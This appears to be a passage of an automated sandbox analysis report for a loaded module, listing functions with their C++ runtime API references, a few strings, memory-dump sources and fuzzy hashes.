                                                                                                          • Opcode Fuzzy Hash: 3bdb124786e42ae7e6a643b267801caf05d0365b43f31e5ba3d3f82178fadccd
                                                                                                          • Instruction Fuzzy Hash: D3116776204B059BD720CE18C880B56B3F5EF84B04F44492DD8B687686D731F809CAA2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0815B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::exception::exception.LIBCMT ref: 6F081640
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F081657
                                                                                                            • Part of subcall function 6F081250: std::_Xinvalid_argument.LIBCPMT ref: 6F08126E
                                                                                                            • Part of subcall function 6F081250: _memmove.LIBCMT ref: 6F0812E0
                                                                                                            • Part of subcall function 6F081250: _memmove.LIBCMT ref: 6F081305
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2097953723-2241063504
                                                                                                          • Opcode ID: 0f813127fe0a05d9aeb78c1f052dda36b5cc1b468f9b3823479a4ab7555b7e51
                                                                                                          • Instruction ID: 182d39ca26cae89f83feba04896b882243ce513a206f4cbaa1ef2a167a6cee0f
                                                                                                          • Opcode Fuzzy Hash: 0f813127fe0a05d9aeb78c1f052dda36b5cc1b468f9b3823479a4ab7555b7e51
                                                                                                          • Instruction Fuzzy Hash: 9A219771204B099BCB24DF49C840B52B3E5FF84704F04896DD5BA8BA91DB72F914CB96
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F033B30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::exception::exception.LIBCMT ref: 6F033BA9
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F033BBE
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 757275642-2241063504
                                                                                                          • Opcode ID: 92b3232e319de8b207343260333e0e7757d66d8249ab914ad4f1914765aa21e4
                                                                                                          • Instruction ID: 5074e69d13ba0ff7da30d4a34510032ebee01ccff3068154bce8973774e72e24
                                                                                                          • Opcode Fuzzy Hash: 92b3232e319de8b207343260333e0e7757d66d8249ab914ad4f1914765aa21e4
                                                                                                          • Instruction Fuzzy Hash: BE110DB59003089FDB04CF99D484BAEB7F4BF48710F50855EE51997391D771EA04CBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F033BD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::exception::exception.LIBCMT ref: 6F033C49
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F033C5E
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 757275642-2241063504
                                                                                                          • Opcode ID: 59d17ca491b848530e0b0062c9448d40e65f2b8ddeecc212f3e2414667bae84f
                                                                                                          • Instruction ID: ee139599490fdb2c541db0da91b9d2dedf0b0b0339f9e317a893d2ae777abbf9
                                                                                                          • Opcode Fuzzy Hash: 59d17ca491b848530e0b0062c9448d40e65f2b8ddeecc212f3e2414667bae84f
                                                                                                          • Instruction Fuzzy Hash: AD110AB59043089FDB08CF99D880BAEB7F4BF88710F50859EE91997391D771EA04DBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F081660 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::exception::exception.LIBCMT ref: 6F0816F3
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F08170A
                                                                                                            • Part of subcall function 6F081250: std::_Xinvalid_argument.LIBCPMT ref: 6F08126E
                                                                                                            • Part of subcall function 6F081250: _memmove.LIBCMT ref: 6F0812E0
                                                                                                            • Part of subcall function 6F081250: _memmove.LIBCMT ref: 6F081305
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2097953723-2241063504
                                                                                                          • Opcode ID: 6c51fc2c6da1945d7a4969969995382f7ab1c598ffac12e9f6c3502f5c2d9935
                                                                                                          • Instruction ID: 76f0cae0db54576f1c176e19a7a10a21223a67fa5915358d26a3667f6f2f9614
                                                                                                          • Opcode Fuzzy Hash: 6c51fc2c6da1945d7a4969969995382f7ab1c598ffac12e9f6c3502f5c2d9935
                                                                                                          • Instruction Fuzzy Hash: 272147752047059FDB20CF18D880B56B3F5FF98714F18892CD8BA87685D771F819CA62
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F039840 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F0398A6
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F0398BB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 4063778783-2241063504
                                                                                                          • Opcode ID: f1e7f7a89c2d94a2891215da1c54fa2dc72ea1aea35ea02153a0717a854b1839
                                                                                                          • Instruction ID: 609d34735260e14c5e8c998b3b2e5f48628b6e28cf11c0dda5dc709543f64cc9
                                                                                                          • Opcode Fuzzy Hash: f1e7f7a89c2d94a2891215da1c54fa2dc72ea1aea35ea02153a0717a854b1839
                                                                                                          • Instruction Fuzzy Hash: 6F1109B6900208AFCB04DF89D440ACEBBF8FF98310F54849EE9189B351D771EA00CBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F024620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6F024636
                                                                                                            • Part of subcall function 6F089125: std::exception::exception.LIBCMT ref: 6F08913A
                                                                                                            • Part of subcall function 6F089125: __CxxThrowException@8.LIBCMT ref: 6F08914F
                                                                                                            • Part of subcall function 6F089125: std::exception::exception.LIBCMT ref: 6F089160
                                                                                                          • _memmove.LIBCMT ref: 6F02466F
                                                                                                          Strings
                                                                                                          • invalid string position, xrefs: 6F024631
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                          • String ID: invalid string position
                                                                                                          • API String ID: 1785806476-1799206989
                                                                                                          • Opcode ID: a9543adcf08ac48ec0277f26ce2846a76cc3be3b615e24f42cc955286c2d922e
                                                                                                          • Instruction ID: 949f3d2c29b8496708871b2b38eb03a7aded939500293ea844afdcd4e9e6cb6a
                                                                                                          • Opcode Fuzzy Hash: a9543adcf08ac48ec0277f26ce2846a76cc3be3b615e24f42cc955286c2d922e
                                                                                                          • Instruction Fuzzy Hash: E301DB35304340ABD320DEACDC84B5AB7EAFBD5A14B24492ED195CB746D6B1EC4187B2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0459D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::exception::exception.LIBCMT ref: 6F045A55
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F045A6A
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 757275642-2241063504
                                                                                                          • Opcode ID: f3dd402e6d42e3a8575f4fca9f5432278cc0a6605f8f4af5bbdd29f8f9093a1f
                                                                                                          • Instruction ID: 690dc5f04e1798f7ca707102680dbdd999449db7f7aad8bb618d47ce70b50ee4
                                                                                                          • Opcode Fuzzy Hash: f3dd402e6d42e3a8575f4fca9f5432278cc0a6605f8f4af5bbdd29f8f9093a1f
                                                                                                          • Instruction Fuzzy Hash: D9111CB59003089FCB04CF99D880AAEF7F4BF88710F50855ED9299B351D771EA04CBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04DBC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F04DC16
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F04DC2B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 4063778783-2241063504
                                                                                                          • Opcode ID: 2fb2648f2aa6620951a6fd12b3ad341291b97fba27a8b5cd609a0567bda8b74e
                                                                                                          • Instruction ID: 7fae453ee30607a2635a6c394e9efed594c2e4962af7a29ad88a646371358f02
                                                                                                          • Opcode Fuzzy Hash: 2fb2648f2aa6620951a6fd12b3ad341291b97fba27a8b5cd609a0567bda8b74e
                                                                                                          • Instruction Fuzzy Hash: 51F03676900208ABDF04DF95D8407DEB7B8FF59354F808069ED18A7285D771A709CBE1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F045950 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F0459A6
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F0459BB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 4063778783-2241063504
                                                                                                          • Opcode ID: b59985a6cc9827fef073ce4735637a89b6b33fb426c3750c902118d4bb31fea3
                                                                                                          • Instruction ID: 77c981c1911ec2315f3d489c229dc06ecc6a9b7e0dc53609c861944cf056228b
                                                                                                          • Opcode Fuzzy Hash: b59985a6cc9827fef073ce4735637a89b6b33fb426c3750c902118d4bb31fea3
                                                                                                          • Instruction Fuzzy Hash: 17F03676900208ABDF04DF99D8417DEB7B8FB59314F808469ED18A7285D771A709CBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F05ACA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • type_info::operator!=.LIBCMT ref: 6F05ACF8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: type_info::operator!=
                                                                                                          • String ID: Modulus$PublicExponent
                                                                                                          • API String ID: 2241493438-3324115277
                                                                                                          • Opcode ID: 9ad3fc797dd8bee214cc1f960b45194c8d90220fb8ee7a1680213cd3ff01cee8
                                                                                                          • Instruction ID: b7d81f8c6a2473a700c35dbec4332b88b41b12b2f6308d81248f890886a875e8
                                                                                                          • Opcode Fuzzy Hash: 9ad3fc797dd8bee214cc1f960b45194c8d90220fb8ee7a1680213cd3ff01cee8
                                                                                                          • Instruction Fuzzy Hash: 2211E0709193049FCB00DF788A4474BFBE4FFD6248F50466EF4855B2A0EBB19858CBA6
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F07B7F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • type_info::operator!=.LIBCMT ref: 6F07B848
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: type_info::operator!=
                                                                                                          • String ID: Modulus$PublicExponent
                                                                                                          • API String ID: 2241493438-3324115277
                                                                                                          • Opcode ID: c6c2e956eb1f26f85db5ee2e897b105e536d724272483c8de5d14e67ccc4e62e
                                                                                                          • Instruction ID: b8c9cd2fd535d50c308ebfc0a7d573ffd7beb9ceab0c89b98c2fb0c00320279a
                                                                                                          • Opcode Fuzzy Hash: c6c2e956eb1f26f85db5ee2e897b105e536d724272483c8de5d14e67ccc4e62e
                                                                                                          • Instruction Fuzzy Hash: 2C11E3B05183449EC710DF78894078BFBE4EFD5248F0006AEF8845B2A5DF31D849CB9A
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F058E40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F08ADFC: __aligned_offset_malloc.LIBCMT ref: 6F08AE09
                                                                                                            • Part of subcall function 6F0891F6: std::_Lockit::_Lockit.LIBCPMT ref: 6F089202
                                                                                                          • std::exception::exception.LIBCMT ref: 6F058E98
